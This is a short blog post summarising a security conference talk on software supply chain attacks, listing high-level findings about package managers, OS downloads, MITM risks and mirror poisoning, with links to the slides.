I recently presented Supply Chainsaw: Practical software supply chain attacks for everyone at the OPCDE technical security conference in Dubai.
In between pictures of Sharknadoes and memes were an array of software supply chain attacks:
- We proved most programming language package managers have major security weaknesses
- Typo or wrong command attacks compromise those who make mistakes installing packages
- Anonymous automatic registration and publishing make attacks easy
- Weak authentication, no 2-factor, sometimes none at all
- Developers of popular open-source packages and their powerful credentials are exposed to many different attacks through the development process and permanent credential caching
- Operating system package managers are manual-review and harder to poison
- But nearly every OS is acquired insecurely and unlikely to be verified by the user, from Linux to Mac OS, to Windows
- MITM attacks proven practical against proxy/VPN/Tor users - over 5,000 potential opportunities to poison executable downloads in my test
- We became OS and package mirrors to prove
- Anyone could infect packages and OS’s delivered via mirror
- Can be quick, cheap, anonymous, with worldwide effect
- Packages often are not verified against anything external
- We were never denied anything we asked for
- We are running honest mirrors, but we have no guarantee others are trustworthy or have not been compromised
- Between hundreds and millions of users can be compromised using these techniques
- Supply chain attacks are happening in the wild now
You can download the presentation here: Supply Chainsaw or you can view on slideshare (although you'll miss out on the slides with animations) here:
Supply Chainsaw